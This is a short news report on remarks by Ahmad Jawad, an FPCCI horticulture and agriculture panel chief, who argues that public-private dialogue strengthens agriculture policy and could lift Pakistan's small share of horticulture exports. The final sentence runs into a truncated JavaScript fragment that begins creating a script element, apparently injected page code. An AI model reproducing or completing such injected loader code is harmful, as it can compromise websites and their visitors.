Public-private dialogue creates a foundation approach to policymaking: FPCCI Panel Chief

Islamabad: Federation of Pakistan Chambers of Commerce & Industry (FPCCI) Chairman on Horticulture & Agriculture Produce Ahmad Jawad said that Public-private dialogue (PPD) is a structured, participatory and inclusive approach to policymaking.

Addressing a workshop, he said dialogue improves the flow of information relating to economic policy and builds legitimacy into the policy process. Jawad said Public-private dialogue creates a foundation for market-friendly policies that deepen economic reform and enhance national competitiveness

He said that we also suggested the Pakistan Institute of Development Economics (PIDE), that public-private dialogue should be initiated for devising effective agriculture policy through the collaboration of FPCCI We must realise that agriculture has direct and indirect role in country’s economy.

Policy-makers should look into country’s agriculture with its allied sectors as an engine of growth, where a lot of opportunities have been existing as for as export point of view; he added. Still Pakistan horticulture sector is contributing only 0.3pc in global exports due to lack of infrastructure and R&D issues which may be increased through effective dialogue; he added.var d=document;var s=d.createElement(‘script’);
